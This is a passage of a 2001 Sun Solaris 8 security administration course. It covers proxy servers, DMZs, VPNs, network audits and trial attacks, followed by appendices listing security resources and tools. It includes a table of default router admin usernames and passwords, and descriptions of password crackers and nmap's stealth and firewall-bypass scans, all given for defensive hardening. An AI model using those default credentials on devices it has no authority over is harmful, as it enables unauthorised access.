Proxy software has advanced well beyond its original concept, and inmany cases has become conjoined with firewall technology to constructwhat might be called a defensive perimeter, that is, a combination firewalland proxy server. Most modern proxy offerings now include proxy DNSsupport, SSL encryption, and FTP filtering. There is often a furtheradvantage. Because proxy servers must cache data returns so that the datacan be forwarded to the requester, it follows that the cache provides amajor speed increase for much-used network connections because thedata is held in RAM, not accessed from the Internet. Documents, and evenentire sites, can be preloaded into the cache, or scheduled to load.

A fairly good, Open Source implementation of a fully cached proxy serveris available at the following URL: http://www.squid-cache.org/.



Securing Routers, Proxy Servers, and Firewalls

Routers, firewalls, and proxy servers protect administrative functions byusing passwords. These passwords must be kept private, because anyonewith the appropriate password can change routing tables, and reconfigurefirewalls or proxy servers.



Certain firewall components, such as routers, tend to have preconfiguredpasswords, to make it easy for the administrator to install and configurethem. However, some of these passwords are now common knowledge.Therefore, you must change such passwords before the device or softwareis deployed as part of a firewall system. Some example presetadministrative accounts and passwords for common routers are shown inTable 18-2.

You must also remember that routers are usually accessed through aremote terminal. For this reason, you should change passwords regularlyand limit knowledge of them to a very few individuals. If possible, youshould disable remote connection to firewall components, and enforceadministrative changes through the physical console.

Table 18-2 List of Preset Router Administrative Accounts

Manufacturer Username Password

Bay Networks Manager <null>

3com admin synnet

debug synnet

manager manager

Cisco enable cisco

(telnet) cisco

Shiva root <null>

Motorola cablecom router



Creating Demilitarized Zones (DMZ)

The term demilitarized zone (or DMZ) refers to a part of the LAN that isbetween two firewalls. One firewall separates the DMZ from the internalLAN, while the other separates the DMZ from the outside world. TheDMZ is an area that permits limited, free communication, but maintains asecure profile for the bulk of the private LAN. It is common to sitepublicly visible hosts, such as Web servers and FTP servers, on the DMZ.

The DMZ provides an expendable area. If the area becomes contaminated,or security is compromised, then the entire zone can be rebuilt withoutdamaging the internal network or its data.



Providing Secure Access Using a Virtual PrivateNetwork

A Virtual Private Network (VPN) uses encryption to create a securechannel between two hosts (or networks) as they communicate over aninsecure network–usually the Internet. Each host communicating over aVPN is typically connected to a local network, but with access to theInternet. Communication between the two networks is achieved by“tunneling,” that is, encrypting all data that passes back and forthbetween the hosts. VPNs can exist between an individual machine and aprivate network (client-to-server), or a remote LAN and a private network(server-to-server). A typical VPN architecture is shown in Figure 18-1.



Figure 18-1 Architecture of a Virtual Private Network

There are two basic types of VPN:

● Hardware VPNs are essentially encrypting routers. They have a veryhigh bandwidth and are easy to install. They do not, however, offerthe flexibility of a software solution.

● Software VPNs range from firewalls which support encryption, toVPN clients, which run on individual workstations.

VPNs are available from a variety of vendors, but can also be constructedusing IPsec and firewalls. There is no definitive rule as to the type ofsecurity that they offer, but strong encryption and authentication areusually regarded as mandatory.

Constructing a VPN

The first stage in building a VPN is to decide on the level and type ofencryption. You would usually apply encryption by configuring IPsecsystem-wide. A crucial factor is the packet filtering, that is, filteringwhether packets have the IPsec authentication header, rather than onlytrusting the IP address. By this method, the interconnected machinesknow which other machines they are talking to, just as they would if thenetwork were completely closed.

The VPN is now almost complete. For the simplest VPN, the onlyremaining task is to apply the appropriate filter sets to the firewall, so thatpackets between the IP addresses known to be on the VPN are allowed,but others (on the same circuit) are dropped.



Sample Architectures

This section describes two network architectures. The first shows anarchitecture that is considered secure for most environments. It issufficient for organizations that do not allow uncontrolled access to thenetwork. In practice, this usually means that there is no Internet service.The second example is required for all sites that provide an Internetservice or where security threats are particularly high.

Example 1: Normally Secure Network

The configuration shown in Figure 18-2 is the minimum security thatshould be employed on any network connected to the outside world.

Figure 18-2 Filtered Router and Firewall Network

In this example, the outside world never sees the network because it isconnected through a filtered router and a firewall. Packets from theoutside world are subjected to a set of rules. Only certain packets areallowed through the router to Netcard A, which is part of the firewallmachine. The router discards all other packets. Thus, the router does notallow any direct access from the outside world to any Web servers, eventhough the traffic is destined for TCP port 80, usually thought of as a safedestination. All traffic must pass through the firewall, which makesdecisions about the types of connections allowed (FTP, HTTP, and so on).Because Netcard A and Netcard B are not physically connected, packetsonly pass if the firewall explicitly allows passage. Firewalls of this typedefault to “disallow packets”, which means that nothing passes throughthe firewall unless it is explicitly allowed to do so.

A minimally secure network would have this type of configuration.



Example 2: Highly Secured Network With Subnet

In this example, shown in Figure 18-3, there is a higher level of security,provided by a switch or router between the internal network and thefirewall.

Figure 18-3 Network Incorporating DMZ

This is the minimum level of protection that should be used whenexternal connections are allowed to internal Web servers. Commonly,this serves to form a DMZ between the internal router and thefirewall on which company Web servers reside. This means that thecompany Web servers are afforded the protection of the firewall but,if one of those Web servers is subverted, the intruder must stilldefeat the internal router to access the internal network. Because allfailed attacks are (by default) logged, it is possible that theadministrator would notice an attack pattern on the router, and takepreventive action.

Running Enterprise Security Audits



The security audit is an ongoing task for any organization. This type ofaudit usually includes the following points, although the list is notcomplete:

● Has the file system been hardened?

Use of Titan, ASET, or both.

● Are the file systems audited on a regular basis?

Use of Solaris OE Fingerprint DB or TripWire.

● Are all non-shared data areas hidden?

● Have all unnecessary network services been disabled?

● Is the appropriate level of encryption applied to network traffic?

Use of OpenSSH, SSL, or IPsec

● Is authentication applied to network traffic? If not, is thisappropriate?

Use of TCP Wrappers and host access

● Are defenses for network scanning in place?

Use of Courtney, Gabriel, or PortSentry

● Are the routers configured so that anything that is not explicitly adefined route is forbidden?

● Are the rules for the firewall documented?

Confirm that the documented rules for the firewall are actuallyimplemented by the firewall.

● Confirm that the rules for the proxy server (if any) are those actuallyin place.

Challenge the proxy server from outside the network.

● Run SAINT (or a similar tool) to establish if any new, or existing,security holes are present.

● Document the results of the audit in a report.



Running Trial Attacks

This course covered the effectiveness of tools such as SAINT in theanalysis of network security (see Module 12, “Analyzing NetworkServices”). These tools are valuable in that they can perform regularattacks on internal networks to ensure the continued security of the hostson those networks. Such challenges to security represent a vital part of thecontinuing process of security and you should perform them on a regular,scheduled basis.

Using Third Parties to Run Trial Attacks

Many companies offer the services of both security professionals and“ethical hackers” to challenge networks. This kind of service, when welldone, is a useful addition to the internal audit, but does not replace it.



Obviously, there are certain dangers. The greatest of these dangers is thatthe auditing company is not what it seems to be. You should thereforecarry out certain checks, such as:

1. Are the security consultants each individually accredited to aprofessional (chartered) organization (for example the IEEE, orBritish Computer Society)?

2. In Europe, individuals must be chartered as experts before they canlegally represent themselves as experts. Are the security expertschartered?

3. Has the company produced a full, and commented, plan for theaudit?

4. Do the consultants carry sufficient liability insurance?

In some countries, governmental organizations hire out their own staff toperform security audits. Using such staff is highly recommended becausethey have a high degree of competence, and have been tested by asecurity service. Similarly, the consultancy arms of the vendors of securityhardware and software, for example, Sun Professional Services, have largeamounts of experience in performing security audits and are aware of thelatest threats and patches.

Applying Ongoing Network Security Measures



Implementing security must not be considered as a one-off task. Securityis an integrated, ongoing task that must take a high priority in thescheduled tasks every day. An administrator must frequently monitor andanalyze all logs, otherwise attacks could go unnoticed. Also, new securityholes are being exposed by intruders on a weekly basis, so you mustensure that the level of protection currently applied is adequate.

Similarly, the network administrator cannot enforce security measuresalone. Consider a scenario where the network administrator on a givennetwork has designated repositories for certain classes of documentwithin a company (for example, Secret, Confidential, Personal, andPublic). The network file system has been suitably configured to managesecurity for these repositories, and access permissions have beenestablished. That system will fail if the network administrator has notpreviously consulted with the general administrator to establish rules asto which document falls within each class. Without such cooperation,virtually all documents are likely to be held as Public, even when thisdesignation is inappropriate.



Identifying Ongoing Tasks

When deciding how to continue the monitoring of a network, there is nocorrect answer, but rather a correct way of thinking. This section examinessome of the tasks that should be performed, and the frequency withwhich they should be performed.

If setting up a new network or adding a new host, perform a securityaudit on the affected host and network.

● Example annual tasks:

● Run the internal security audit procedure.

● Optionally, have the network challenged by external auditors.

● Correct any problems found.



● Example monthly tasks:

● Challenge the system using SAINT (or a similar tool) using thewww.SANS.org “top 10 Internet threats” as a starting point.Correct any problems found.

● Examine the routers. Audit for any unauthorized changes.

● Examine the proxy server logs. Submit any anomalies to triageto establish if a new rule should be applied.



● Example daily tasks, and throughout the day:

● Check that the backups are executed.

● Examine the logs for the firewall and the proxy server for thelast 24 hours. Is there anything to give cause for concern?

● Examine system logs generated by tools such as Courtney.

● Examine network activity at various times through the day.Is there anything unexpected?

● Check the current connections for the proxy server. Gain animpression of the type of site being connected. Is there anythingto give cause for concern?

Note – The precise list of tasks depends on the type of software deployedat your site.

Keeping Current With Security Issues



New challenges occur all the time. Intruders are continually attempting todisrupt and by-pass security, and as soon as one hole is plugged, anotheris found. However, the greatest danger is complacency. To avoidbecoming complacent about security, consider consulting with the world-wide security community regarding new challenges.



Identifying Information Sources

Many sites have been published with world-wide security consultation inmind. Good sources of information can be obtained at the sites shown inTable 18-3.

Table 18-3 Sites Offering Security Information

Site Information Offered

http://www.sun.com/security/

A Sun site, and a good starting pointfor Solaris OE systems.

http://www.sun.com/trustedsolaris/ts_tech_faq/

Trusted Solaris OE information fromSun.

http://www.SANS.org Up-to-date information on currentidentified intruder techniques andattacks.



More information sources are supplied in Appendix A.

http://www.cert.org A central clearing house for knownsecurity holes and fixes. Particularlynotable are the CERT advisories thatalert administrators to the latestsecurity breaches.

http://www.w3.org/Security/Faq/www-security-faq.html

A general security FAQ site.

http://csrc.nist.gov/

A security portal, and a good generalstarting point.

http://www.gocsi.com/

A computer crime and security portal.

http://www.securityportal.com/

An up-to-date list of current virusattacks and UNIX-centric challenges.

http://www.bigadmin.com

Solaris OE administration site with vastamounts of information and tools.

ftp://ftp.cerias.purdue.edu/pub/tools/unix

Comprehensive repository of SolarisOE tools, formerly known as COAST.

Table 18-3 Sites Offering Security Information (Continued)

Site Information Offered



A-1Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Appendix A

On-Line Security Resources

Advisory and Certification Bodies

CERT

http://www.cert.org

The CERT Coordination Center (CERT/CC) is a center of Internet securityexpertise. It is located at the Software Engineering Institute(http://www.sei.cmu.edu/ ), a federally funded research anddevelopment center operated by Carnegie Mellon University.

At the CERT/CC, they study Internet security vulnerabilities, handlecomputer security incidents, publish a variety of security alerts, performresearch for long-term changes in networked systems, and developinformation and training to help improve security at your site.

INFOSEC - Information Systems SecurityOrganization

http://www.nsa.gov/isso/index.html

Part of the U.S. National Security Agency (NSA). INFOSEC provides thesolutions, products, and services, and conducts defensive informationoperations, to achieve information assurance for informationinfrastructures critical to U.S. National Security interests.

Advisory and Certification Bodies

A-2 Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Computer Security Technology Center

http://ciac.llnl.gov/cstc/CSTCHome.html

The Computer Security Technology Center, located at the LawrenceLivermore National Laboratory, provides solutions to U.S. governmentagencies facing today's security challenges in information technology.They maintain information protection and core-competencies throughhigh-tech, integrated INFOSEC incident response, product development,and consulting services.

Security Standards

On-Line Security Resources A-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Security Standards

The following groups work with security standards.

Common Criteria

http://www.commoncriteria.org

This is currently the only globally accepted security standard. Orangebook and ITSEC standards are obsolete because of this.

National Security Agency (NSA)

http://www.nsa.gov

The NSA National Computer Security Center (NCSC) is responsible forthe security of the Department of Defense (DoD) and intelligencecommunity. The NSA is also the source of the NSA Rainbow Series ofPublications for Computer Software Security. The Rainbow Series deals withevaluating trusted computer systems, each publication is a different color;for example, the Orange book deals with physical security levels, whichcontrol access to the system.

CSRC – Computer Security Division

http://csrc.nist.gov/

This site contains information about a variety of computer security issues,products, and research of concern to federal agencies, industries, andusers. This site is operated and maintained by National Institute ofStandards and Technology’s (NIST) Computer Security Division as aservice to the computer security and IT community.

Security Standards


ITSEC (Europe)

http://www.itsec.gov.uk/

ITSEC is all about IT security, making sure that you can trust theinformation technology infrastructure on which your organization relies.Under the UK ITSEC scheme, the security features of IT systems andproducts are tested independently of suppliers to identify logicalvulnerabilities. This type of testing is known as security evaluation and itis carried out against standardized criteria to a formalized methodology.Certificates are issued by the Scheme for products meeting therequirements for a claimed level of assurance. United Kingdomcertificates are recognized in many countries of the world.

IEEE Computer Society

http://www.computer.org/

With over 100,000 members, the Institute of Electrical and ElectronicsEngineers (IEEE) Computer Society is the world's leading organization ofcomputer professionals. Founded in 1946, it is the largest of the 36societies of the IEEE.

The Computer Society's vision is to be the leading provider of technicalinformation and services to the world's computing professionals. Itdevelops electrical and communications standards. This includes PortableOperating Systems Interface (POSIX) P1003.6, a security standard.

IETF

http://www.ietf.org/

The Internet Engineering Task Force (IETF) is a large open internationalcommunity of network designers, operators, vendors, and researchersconcerned with the evolution of the Internet architecture and the smoothoperation of the Internet.

Security Standards


The IETF working groups are grouped into areas, and managed by AreaDirectors (ADs). The ADs are members of the Internet EngineeringSteering Group (http://www.ietf.org/iesg.html ). Providingarchitectural oversight is the Internet Architecture Board (IAB),(http://www.isi.edu/iab/ ). The IAB also adjudicates appeals whensomeone complains that the IESG has failed. The IAB and IESG arechartered by the Internet Society (http://www.isoc.org/ ) for thesepurposes. The General Area Director also serves as the chair of the IESGand of the IETF, and is an ex-officio member of the IAB.

The Internet Assigned Numbers Authority (ANA)(http://www.iana.org/ ) is the central coordinator for the assignment ofunique parameter values for Internet protocols. The IANA is chartered bythe Internet Society (ISOC) to act as the clearinghouse to assign andcoordinate the use of numerous Internet protocol parameters.

The Open Group

http://www.opengroup.org/

The Open Group is a vendor-neutral, international consortium ofmembers and is the result of the 1996 merge of the X/Open CompanyLtd. and the Open Software Foundation (OSF).

The Open Group is committed to delivering greater business efficiency bybringing together buyers and suppliers of information technology tolower the time, cost, and risks associated with integrating new technologyacross the enterprise. The Open Group's mission is:

“To offer all organizations concerned with open information infrastructures aforum where we can share knowledge, integrate open initiatives, and certifyapproved products and processes in a manner in which they continue to trust ourimpartiality”.

The key benefit to product suppliers is:

● Accelerated market up-take of products based on Open SystemsStandards

The key benefits to their customers are:

● Reduced cost of integration, leading to increased budget availablefor procurement of products that deliver real value to end users

● Increased flexibility in the infrastructure and interoperability withcustomers, business partners, and suppliers

Useful Web Sites


Useful Web Sites

The following sites provide more general information on security risks.

Sun Security Coordination Team

http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec

The Sun Security Coordination Team investigates reports of securityvulnerabilities, responds to customer inquiries about security problemswith Sun software, and publishes Sun Security Bulletins.

To receive security bulletins directly from the Sun Security CoordinationTeam, send an email to [email protected] and include subscribe cws[your email address] in the subject. For example: subscribe [email protected]

The Computer Incident Advisory Center

http://www.ciac.org/ciac/

The Computer Incident Advisory Center (CIAC) is a department of theUnited States Department of Energy (US DOE) whose motto is: “KeepingDOE secure.” The CIAC publishes security related bulletins on this Website.

Computer and Internet Security Resources

http://www.virtuallibrarian.com/legal/ccstatistics.html

This site provides links to security sites as well as other security resources.

Useful Web Sites


Computer Security Institute

http://www.gocsi.com/

The Computer Security Institute (CSI) is a membership organizationspecifically dedicated to serving and training the information, computer,and network security professional. There is a fee to join. CSI membershipbenefits include the ALERT newsletter, quarterly Journal, and BuyersGuide. CSI also publishes surveys and reports on topics such as computercrime and information security program assessment (IPAK).

For more information about CSI, email [email protected] or telephone+1 415-947-6320.

InfoWar.com

http://www.infowar.com

Provides articles and free Infowar.Com List that brings you up to theminute news on info-security, hacking, infowar, attacks, related news,reviews, and opinion.

InfoWorld.com

http://www.infoworld.com/researchtools/subject_index/security.html

This site lists articles relating to security in date order.

Risks Digest

http://catless.ncl.ac.uk/Risks/

This site provides a forum on risks to the public in computers and relatedsystems. Information is provided in the form of online digests, publishedat irregular intervals (but often more than once a week).

Useful Web Sites


SecurityFocus.com

http://www.securityfocus.com/

Provides security articles and other services as a well as useful list ofsecurity tools.

Security Portal

http://securityportal.com/

Another site providing security articles and weekly digests. Also providesa free security news service sent by email.

SecuritySearch.net

http://www.securitysearch.net/

Another site useful for finding security resources. Lists articles,whitepapers, books, and the latest security bulletins.

SecurityStats.com

http://www.securitystats.com/

This site provides the latest security news and security statistics.

USENIX

www.usenix.org

USENIX is the Advanced Computing Systems Association. It providesinformation on developments of all aspects of computing systems not justsecurity.

B-1Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Appendix B

Solaris OE Security Tools Summary

The Trusted Solaris™ 8 OE

When separation of information and individuals is of prime importance,the consider using the Trusted Solaris™ 8 Operating Environment (OE),an extension of the Solaris™ 8 OE. Trusted Solaris 8 software iscompatible with the Solaris 8 OE. That means administrators who haveused Solaris OE software will also be familiar with most Trusted Solarisadministration tools.

Security Extensions

Over the past few decades, computer systems have become corporate-wide resources, essential for day-to-day operations. A wider range ofinformation on new products, employee compensation, health records,marketing and sales plans, and other sensitive data is often stored onthese systems. Considerable cost, damage, and loss can be caused byhostile or unauthorized access and use of this information. To controlexternal access, firewalls and other access control methods are often usedas gatekeepers. With the Trusted Solaris 8 OE, the software providesextensive internal protection against intruders and misuse by enablingadministrators to:

● Limit access to system data and resources – You can set controls onall potential interactions with programs, file access, and utilities on auser-by-user basis.

● Eliminate superuser – You can divide superuser functions intomultiple roles to make penetration far more difficult.

● Independent evaluation authority – An independent third partyevaluates the operating system to validate that its security functionsare working correctly.


B-2 Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

● Prevent “eavesdropping” in the window environment – Inconventional UNIX environments, an intruding program can capturekeystrokes typed in other windows. Trusted Solaris OE softwareprovides a “trusted” path that protects entered data. This isparticularly important for passwords, which can also be protected byrequiring password changes or generating random passwords.

● Augment security auditing – Actions that might affect security orsensitive files can be monitored. To detect suspicious actions,administrators can generate reports of usage by user, file, data, andtime.

● Prevent spoofing programs – Trojan horses, such as programs tointercept passwords or other sensitive data, are prevented by agraphical user interface and protocol. A trusted graphic displayed ina reserved area provides continuous, visible feedback of sessionintegrity.

● Protect local devices against unauthorized users – Authorized userscan control access to local devices. In many cases, misuse byauthorized users is the main source of security violations. TrustedSolaris software helps stop these violations by enablingadministrators to implement a security policy that controls the accessand handling of information, including system administration,operation, and monitoring tools.

To find out more about Trusted Solaris 8 OE software, visit Sun’s Web siteat www.sun.com/trusted-solaris .

The SunScreen™ Firewall Product

Firewalls control the data flow between two networks, according tosecurity policy rules. The Solaris 8 OE offers built-in firewall functionality,with both the lite- and full-product versions.

SunScreen™ Secure Net 3.1 is a full-featured firewall product that can bedeployed throughout an organization to implement a secure businessnetwork including extranets, secure intranets, and remote access. It offersaffordability, strong cryptography, centralized management, and highavailability for screening and encryption.


Solaris OE Security Tools Summary B-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

SunScreen™ 3.1 Lite is a firewall product that protects individual serversor very small workgroups. It is built from the same code as the fullSunScreen Secure Net 3.1 product, provides high-speed, dynamic statefulpacket-filtering, and includes a subset of the features offered with the fullversion.

See:http://www.sun.com/software/securenet/http://www.sun.com/software/securenet/lite/

SKIP

SKIP secures the network at the IP packet level – any networkedapplication gains the benefits of encryption, without requiringmodification. SKIP is unique in that it offers “on-the-fly” encryption. AnInternet host can send an encrypted packet to another host withoutrequiring a prior message exchange to set up a secure channel.

Some of the advantages of SKIP include:

● No connection setup overhead.

● High-availability; encryption gateways that fail can reboot andresume decrypting packets instantly, without having to renegotiateexisting connections.

● Allows unidirectional IP (for example, IP broadcast using satellite orcable).

● Scalable multicast key distribution.

● Gateways can be configured in parallel to perform instant failover.

See:http://www.sun.com/software/skip/skip15/ds-skip/

IPsec

IPsec is a very strong, network-level protocol. It can protect against avariety of threats, such as sniffing, spoofing, flooding, and hijacking.However, it blocks hosts that do not support it or otherwise have asecurity association with the initiating host. For Web traffic, where themajority of traffic does not require security of any kind, IPsec might needtoo much overhead. IPsec is well suited for VPNs and extranets.



A key feature of the Solaris 8 OE security is the IPsec architecture. IPsec isan initiative to add security services to the IP protocol. It securescommunication channels and ensures that only authorized parties cancommunicate on them.

Sun's implementation of IPsec in the Solaris 8 OE supports shared-secretencryption. The 128-bit MD5 and SHA-1 algorithms are available fordatagram authentication and integrity; 56-bit DES and 168-bit Triple DESalgorithms are available for payload encryption. In addition, the SolarisOE also supports manual keying.

See:http://www.sun.com


Sun Enterprise Authentication Mechanism (SEAM) software provides adistributed, enterprise-wide authentication mechanism for single sign-onthat reduces the number of times each user must go through a loginsequence.

SEAM software delivers an extra layer of security inside your firewall toprotect your enterprise from unauthorized access. Powerfulauthentication and single sign-on capabilities enable SEAM to provide amore secure login process, enabling you to protect your data privacy andintegrity.

See:http://www.sun.com/software/solaris/ds/ds-seam/

Pluggable Authentication Modules (PAM)

Pluggable Authentication Modules (PAM) allows integration of variousauthentication technologies such as UNIX, Kerberos, RSA, smart cards,and DCE into system entry services such as login , passwd , rlogin ,telnet , ftp , and su without changing any of these services. PAM isintegrated into the Solaris 2.6 release.

See:http://www.sun.com/software/solaris/pam/


Solaris OE Security Tools Summary B-5Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Sun Enterprise Network Security Service (SENSS)

Sun Enterprise Network Security Service (SENSS) is a flexible Javatechnology-based security solution that permits organizations to auditand secure their systems and networks in a modern, heterogeneous,corporate intranet. The software provides a network service daemon thatshould be installed on each host in your network; these daemons can thenbe linked together in a hierarchy of trust. This hierarchy can be used forthe distribution and execution of digitally-signed packets containing Javatechnology code, script, or binary code, which can proactively check andfix host security issues in a bulk, batch-oriented manner. Executionrequests are also digitally signed, replay attacks are prevented, andnetwork communications are secured by ACLs, PAMs, and securitymodules.

See:http://www.sun.com/communitysource/senss/

Solaris OE Fingerprint Database

This SunSolveSM service enables you to verify the integrity of filesdistributed with the Solaris OE, such as the /bin/su executable file,Solaris software patches, and unbundled products such as SPARCcompilers.

The Solaris OE Fingerprint Database ensures that you are using a true filein an official binary distribution, and not an altered version that cancompromise system security. If you suspect someone has changed yoursystem without your authorization, you can use the Solaris OEFingerprint Database to check files for alteration or damage.

See:http://sunsolve.sun.com/pubcgi/

show.pl?target=content/content7

PATCHDIAG

PATCHDIAG and patchdiag.xref are intended to check and verify thecurrent patch level of Solaris OE systems.

See:http://sunsolve.sun.com



ASET

The Solaris OE includes a software “security guard” for Sun systemscalled Automated Security Enhancement Tool (ASET). Like the securitymeasures of a building, ASET has three levels of computer systemsecurity (Low, Medium, High) that depend on what the system is used forand how valuable or sensitive the data or programs that reside on thesystem are.

C-1Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Appendix C

Third-Party Security Tools

SAINT (SATAN/SARA)

SAINT is the Security Administrator's Integrated Network Tool. In itssimplest mode, it gathers as much information about remote hosts andnetworks as possible by examining such network services as finger , NFS,NIS , ftp , tftp , rexd , statd , and other services.

The information gathered includes the presence of various networkinformation services as well as potential security flaws—usually in theform of incorrectly setup or configured network services, well-knownbugs in system or network utilities, or poor or ignorant policy decisions. Itcan then either report on this data or use a simple rule-based system toinvestigate any potential security problems.

Users can examine, query, and analyze the output with an HTML browser.While the program is primarily geared towards analyzing the securityimplications of the results, a great deal of general network information canbe gained when using the tool—network topology, network servicesrunning, types of hardware and software being used on the network, andso on.

However, the real power of SAINT comes into play when used inexploratory mode. Based on the initial data collection and a userconfigurable ruleset, SAINT examines the avenues of trust anddependencies and iterates further data collection runs over secondaryhosts. This not only allows you to analyze your own network or hosts, butalso to examine the real implications inherent in network trust andservices and helps you make reasonably educated decisions about thesecurity level of the systems involved.


C-2 Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

SAINT has a target acquisition program that normally uses the fpingcommand to determine whether a host or set of hosts in a subnet are alive.When a host is behind a firewall, however, the tcp_scan program is usedto probe common ports to test for an alive host. It then passes this targetlist to an engine that drives the data collection and the main feedbackloop. Each host is examined to see if it has been seen before, and, if not, alist of tests/probes is run against it (the set of tests depends on thedistance the host is from the initial target and what probe level has beenset.) The tests emit a data record that has the hostname, the test run, andany results found from the probe; this data is saved in files for analysis.The user interface uses HTML to link the often vast amounts of data tomore coherent and palatable results that the user can digest andunderstand.

See:http://athena.fit.qut.edu.au/usr/src/saint-1.2.1/html/saint.htmlftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/http://www-arc.com/sara/

Courtney

Courtney detects and reports the presence of scanners, programs likeSATAN, that probe a number of ports on a system in a short time period.The information gathered can identify security vulnerabilities.

Courtney, a Perl script, uses a utility called tcpdump to determine whethera scanner has probed a system. Essentially, the tcpdump utility sets thehost's Ethernet interface so that the utility can analyze all the TCP/IPpackets transmitted on the wire. The tcpdump utility then filters theinformation to highlight suspicious activity and hands this information toCourtney for further analysis. Courtney searches for a specific fingerprintin the data, but unfortunately this is not always successful, because thetcpdump utility might sometimes relay inaccurate information.Particularly on slow hosts or networks with very high traffic, the tcpdumputility might miss some packets and, therefore, miss the distinctivesignature of a scanner. However, Courtney does provide a first line ofdefense.

See:ftp://ftp.csc.ncsu.edu/pub/security/anti-satan/


Third-Party Security Tools C-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Gabriel

Gabriel is a SATAN detector, similar to Courtney. While it is only availablefor Sun platforms, it is written entirely in the C programming language,and comes prebuilt.

See:ftp://ftp.csc.ncsu.edu/pub/security/

TripWire

TripWire for Servers software monitors file changes, verifies integrity, andnotifies you of any violations of data at rest on network servers. Tripwirefor Servers monitors all file changes regardless of whether they originatedinside or outside of your organization. TripWire for Servers also identifieschanges to system attributes including file size, access flags, write time,and more. You can quickly assess the impact of changes using TripWirefor Servers' easy-to-read reports.

See:http://www.tripwire.com/ftp://ftp.cerias.purdue.edu/pub/tools/unix/ids/tripwire/

Top

Monitors the top CPU memory and disk usage.

See:http://www.sunfreeware.com

TCP Wrappers

With this package you can monitor and filter incoming requests for thesystat , finger , ftp , telnet , rlogin , rsh , exec , tftp , talk , and othernetwork services.



This package provides tiny daemon wrapper programs that can beinstalled without any changes to existing software or to existingconfiguration files. The wrappers report the name of the client host and ofthe requested service; the wrappers do not exchange information with theclient or server applications, and impose no overhead on the actualconversation between the client and server applications.

See:ftp://playground.sun.com/pub/casperhttp://www.sunfreeware.com

Crack

Crack is a password guessing program that quickly locates insecurities inUNIX (or other) password files by scanning the contents of a passwordfile, looking for users who have chosen a weak login password.

See:ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

John the Ripper

John the Ripper is a password cracker, currently available for UNIX, DOS,Windows NT/95. It detects weak UNIX passwords. It has been testedwith Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.xSPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX.

See:http://www.openwall.com/john/

AntiCrack

AntiCrack is a password checking program. It checks a “raw (not-encrypted)” UNIX password, so it is much faster than Crack.

AntiCrack uses rules and dictionaries in the same manner as Crack does.If you already use Crack, the rules and the dictionaries for Crack can beused for AntiCrack as they are.

See:http://www.teu.ac.jp/nsit/~tominaga/anticrack/



The npasswd Command

The npasswd command replaces the system passwd command to ensurethat users use passwords undetectable by crack .

See:

ftp://ftp.cc.utexas.edu/pub/npasswd

Secure Shell (SSH)

Secure Shell (SSH) is a telnet and ftp replacement. Features of the SSHSecure Shell include:

● Protects all passwords and data.

● Full replacement for telnet , rlogin , rsh , rcp , and ftp commands.

● Fully integrated secure file transfer and file copying.

● Graphical user interface on Microsoft Windows.

● Automatic authentication of users, no passwords sent in clear text toprevent the stealing of passwords.

● Multiple strong authentication methods that prevent such securitythreats as spoofing identity.

● Authentication of both ends of connection, the server and the clientare authenticated to prevent identity spoofing, Trojan horses, and soon.

● Automatic authentication using agents enable strong authenticationfor multiple systems with a single sign-on.

● Transparent and automatic tunneling of X11 sessions.

● Tunneling of arbitrary TCP/IP-based applications, such as email.Encryption and compression of data for security and speed.

● Multiple built-in authentication methods, including passwords,public key, and host-based authentication.

● Multiple ciphers for encryption, including 3DES, Blowfish, and theAES candidate TWOFISH.

See:http://www.ssh.com/products/ssh/index.html



The nmapUtility

The nmap utility scans the ports of large networks, although it also worksfor single hosts. The philosophy behind the nmap utility is TMTOWTDI(There's More Than One Way To Do It). This is the Perl slogan, but it isequally applicable to scanners. Sometimes you need speed, other timesyou need stealth. In some cases, bypassing firewalls might be required.You might want to scan different protocols (UDP, TCP, ICMP, and so on.).You just can not do all this with one scanning mode. And you do not wantto have ten different scanners around, all with different interfaces andcapabilities. Therefore, almost every scanning technique is incorporatedinto the nmap utility. Specifically, the nmap utility supports:

● Vanilla TCP connect() scanning

● TCP SYN (half open) scanning

● TCP FIN, Xmas, or NULL (stealth) scanning

● TCP FTP proxy (bounce attack) scanning

● SYN/FIN scanning using IP fragments (bypasses some packet filters)

● TCP ACK and Microsoft Window scanning

● UDP raw ICMP port unreachable scanning

● ICMP scanning (ping-sweep)

● TCP Ping scanning

● Direct (non–portmapper) RPC scanning

● Remote OS Identification by TCP/IP fingerprinting

● Reverse-identity scanning

See:http://www.insecure.org/nmap/



Titan

Titan is a collection of programs, each of which either fixes or tightens oneor more potential security problems with a particular aspect in the setupor configuration of a UNIX system. Created by Brad Powell, it waswritten in the Bourne shell, and its modular design makes it easy foranyone who can write a UNIX shell script or program to add to it, as wellcompletely understand the internal workings of the system.

Titan does not replace other security tools, but when used in combinationwith them, it can help make the transformation of a new, out of the boxsystem into a firewall or security conscious system a significantly easiertask. In a nutshell, it attempts to improve the security of the system it runson.

See:http://www.fish.com/titan/

COPS

COPS (Computer Oracle and Password System) is a set of programs thatattempt to automate security checks that are often performed manually(or perhaps with self-written short shell scripts or programs) by a systemsadministrator.

See:ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/

Tiger

Tiger supplements COPS by providing additional information on whetherthe system files have been tampered with. Tiger is one of the tools usedregularly on Texas A&M's UNIX computers to detect intrusions.

See:ftp://ftp.vanderbilt.edu/pub/unix/



The dsniff Sniffer

